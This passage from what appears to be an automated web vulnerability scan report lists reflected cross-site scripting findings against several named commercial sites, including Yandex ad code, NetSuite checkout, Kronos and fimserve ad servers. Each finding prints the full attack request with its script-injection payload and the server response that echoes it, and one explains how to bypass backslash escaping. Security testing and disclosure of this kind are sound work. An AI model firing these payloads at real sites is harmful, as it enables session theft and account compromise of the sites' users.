User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:47:53 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:47:53 GMT
Expires: Mon, 25 Apr 2011 14:47:53 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 67

<!-- Bad partner/domain for page 47934 (0, de788(a)f60c8b163e7) -->
6.3. http://an.yandex.ru/code/57617 [target-ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ff26(a)615e8e384bf was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/57617?rnd=29605&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=2ff26(a)615e8e384bf&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:22:57 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:22:57 GMT
Expires: Mon, 25 Apr 2011 14:22:57 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 67

<!-- Bad partner/domain for page 57617 (0, 2ff26(a)615e8e384bf) -->
6.4. http://an.yandex.ru/code/66894 [target-ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/66894

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ad56b(a)20328a529f was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/66894?rnd=148599&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=ad56b(a)20328a529f&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:24:47 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:24:47 GMT
Expires: Mon, 25 Apr 2011 14:24:47 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 66

<!-- Bad partner/domain for page 66894 (0, ad56b(a)20328a529f) -->
6.5. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 97042<script>alert(1)</script>906f6279423 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction97042<script>alert(1)</script>906f6279423&n=ar_int_p97174789&1303741250889 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:31:28 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction97042<script>alert(1)</script>906f6279423("");
6.6. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /core/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 21856'%20style%3dx%3aexpression(alert(1))%20b662ee241cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21856\' style=x:expression(alert(1)) b662ee241cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/?21856'%20style%3dx%3aexpression(alert(1))%20b662ee241cf=1 HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; NLVisitorId=rcHW8495AWICDiX0; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:05:45 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110531729:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=VXMTN1NJZvQ6fx6SQq6bnR2Yztv7L6v79G1pNDsYlHnL2NW1VbWYQynfwrCTfhNmdJf0N1pvRxWRVBGXCQTGYT0LZTpCPytnGtVysYRypnS56r06v0mkRXCmkzXVSVrd!-620026609; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 15:05:45 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2422


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?alias=core&21856\' style=x:expression(alert(1)) b662ee241cf=1&21856\'%20style%3dx%3aexpression(alert(1))%20b662ee241cf=1'>
...[SNIP]...
6.7. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /core/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8226f\'%3balert(1)//b3b0eb2a796 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8226f\\';alert(1)//b3b0eb2a796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /core/?8226f\'%3balert(1)//b3b0eb2a796=1 HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; NLVisitorId=rcHW8495AWICDiX0; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:05:57 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -704362580:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=byykN1NVD9GV54JxSWRsMvBTxhWWpyzhrfD56p2fM5lLyD4ZGXvzTLJXNyy8xh2F9cPqgPJ6sWyNTvPshQdv6JWL4dS2RpvcpfkcVvY52cFxxGhFrYTp9bLnXcvfQsy5!-620026609; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 15:05:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2338


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<script language='Javascript' type='text/javascript'>document.location.href='/s.nl?alias=core&8226f\\';alert(1)//b3b0eb2a796=1&8226f\\'%3balert(1)//b3b0eb2a796=1&redirect_count=1&did_javascript_redirect=T'</script>
...[SNIP]...
6.8. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl/c.438708/n.1/sc.4/.f

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f2ecd'%20style%3dx%3aexpression(alert(1))%20f4981310c68 was submitted in the REST URL parameter 2. This input was echoed as f2ecd\' style=x:expression(alert(1)) f4981310c68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl/c.438708f2ecd'%20style%3dx%3aexpression(alert(1))%20f4981310c68/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:29:37 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2000712853:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=968
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2020


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?c=438708f2ecd\' style=x:expression(alert(1)) f4981310c68&n=1&sc=4&ext=T&login=T&reset=T&newcust=T&noopt=T&ext=T&login=T&reset=T&newcust=T&noopt=T'>
...[SNIP]...
6.9. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl/c.438708/n.1/sc.4/.f

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 33c23'%20style%3dx%3aexpression(alert(1))%204a27bdc6747 was submitted in the REST URL parameter 3. This input was echoed as 33c23\' style=x:expression(alert(1)) 4a27bdc6747 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl/c.438708/n.133c23'%20style%3dx%3aexpression(alert(1))%204a27bdc6747/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:31:29 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 333369207:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2020


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?c=438708&n=133c23\' style=x:expression(alert(1)) 4a27bdc6747&sc=4&ext=T&login=T&reset=T&newcust=T&noopt=T&ext=T&login=T&reset=T&newcust=T&noopt=T'>
...[SNIP]...
6.10. https://customer.kronos.com/default.asp [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /default.asp

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca2df"><script>alert(1)</script>9c27ecf4a9d was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /default.asp?rurl=%2Fuser%2Fmanagefavorites%2Easp?favurl%3Dhttp%3A%2F%2Fcustomer%2Ekronos%2Ecom%2Fsitefeedbackform%2Ehtm%7Ct%3Dsiteca2df"><script>alert(1)</script>9c27ecf4a9d HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1303741346229; s_lv=1303741346233; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=NBPMPBCADGEDPGNKKLNHKCIO

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:25:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17417
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=rurl%3D%252Fuser%252Fmanagefavorites%252Easp%3Ffavurl%253Dhttp%253A%252F%252Fcustomer%252Ekronos%252Ecom%252Fsitefeedbackform%252Ehtm%257Ct%253Dsiteca2df%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9c27ecf4a9d; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
<INPUT type="hidden" name="rurl" value="/user/managefavorites.asp?favurl=http://customer.kronos.com/sitefeedbackform.htm|t=siteca2df"><script>alert(1)</script>9c27ecf4a9d">
...[SNIP]...
6.11. http://demr.opt.fimserve.com/adopt/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://demr.opt.fimserve.com
Path:   /adopt/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19ac4'%3balert(1)//6e1f792b3af was submitted in the sz parameter. This input was echoed as 19ac4';alert(1)//6e1f792b3af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adopt/?r=h&l=999e4367-df70-42c4-a090-65a968de6505&sz=300x25019ac4'%3balert(1)//6e1f792b3af&neg=&ega=&puid=&rnd=2466948 HTTP/1.1
Host: demr.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; SUBHS=|||00FY6l1fm00000pjK4H|1.1303561987332; LO=00GO66Bfm00000f500n1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:09:28 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: keep-alive
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 179
Server: ASP/0.0.0.0/0.7.61

<script language='Javascript'>
_sdc_loaded=true;
_sdc_error=true;
_sdc_loc_ext_id='999e4367-df70-42c4-a090-65a968de6505';
_sdc_sz='300x25019ac4';alert(1)//6e1f792b3af';
</script>
6.12. http://desk.opt.fimserve.com/adopt/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://desk.opt.fimserve.com
Path:   /adopt/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40f29'%3balert(1)//c9cb65877c9 was submitted in the sz parameter. This input was echoed as 40f29';alert(1)//c9cb65877c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adopt/?r=h&l=999e4367-df70-42c4-a090-65a968de6505&sz=160x60040f29'%3balert(1)//c9cb65877c9&neg=&ega=&puid=&rnd=6148479 HTTP/1.1
Host: desk.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/ConsumerResources.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 16:14:40 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: keep-alive
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 179

<script language='Javascript'>
_sdc_loaded=true;
_sdc_error=true;
_sdc_loc_ext_id='999e4367-df70-42c4-a090-65a968de6505';
_sdc_sz='160x60040f29';alert(1)//c9cb65877c9';
</script>
6.13. http://ds.addthis.com/red/psi/sites/www.kronos.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.kronos.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload caea3<script>alert(1)</script>a8615876143 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.kronos.com/p.json?callback=_ate.ad.hprcaea3<script>alert(1)</script>a8615876143&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.kronos.com%2Fabout%2Fabout-kronos.aspx&zzr8oz HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303662902.1FE|1303662902.1OD|1303662902.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 25 Apr 2011 13:51:39 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25 May 2011 13:51:39 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 25 Apr 2011 13:51:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 13:51:39 GMT
Connection: close

